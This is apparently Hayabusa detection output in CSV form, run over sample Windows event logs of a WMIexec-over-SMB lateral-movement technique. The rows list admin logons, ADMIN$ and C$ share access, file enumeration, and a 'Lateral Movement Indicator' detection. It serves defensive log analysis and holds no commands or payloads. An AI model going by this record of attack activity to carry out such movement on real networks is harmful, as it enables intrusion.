+2021-04-22 20:32:03.483 +09:00,fs03vuln.offsec.lan,4674,low,Lateral Movement Indicator ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.546 +09:00,fs03vuln.offsec.lan,4674,low,Lateral Movement Indicator ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: __1619090610.0007844  :  IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63564  :  LogonID: 0x18acdd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admmig\Desktop\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63565  :  LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63566  :  LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63567  :  LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:27.649 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path:   :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation:   :  IP Address: 10.23.23.9  :  Port: 63564  :  LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig  :  LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Program Files\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.306 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\assembly\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\DesktopTileResources\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Downloaded Program Files\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Fonts\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ImmersiveControlPanel\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\media\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.352 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\Offline Web Pages\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ToastData\desktop.ini  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\ar  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\bg  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\cs  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\da  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\de  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\el  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\en  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\es  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\et  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\fi  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\fr  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\he  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\hr  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\hu  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\it  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\ja  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\ko  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\lt  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\lv  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\nl  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\no  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Windows\ADFS\pl  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
